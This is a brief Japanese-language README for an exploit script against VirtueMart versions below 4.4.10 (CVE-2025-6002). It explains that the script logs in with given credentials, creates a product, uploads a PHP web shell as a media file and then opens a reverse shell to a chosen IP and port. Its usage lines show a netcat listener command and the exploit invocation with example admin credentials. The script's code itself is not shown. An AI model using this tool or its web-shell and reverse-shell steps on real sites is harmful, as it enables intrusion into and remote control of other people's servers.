
このスクリプトは、VirtueMart < 4.4.10 (CVE-2025-6002) の認証済み任意ファイルアップロードの脆弱性を悪用します。この脆弱性は、次のブログ記事で説明されています: https://blog.blacklanternsecurity.com/p/doomla-zero-days
このスクリプトは、指定された認証情報で VirtueMart にログインし、新しい製品を作成して、PHP Web シェルをメディアファイルとしてアップロードします。その後、指定された IP/ポートへのリバースシェルを起動します。
パラメータ:
使用方法:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337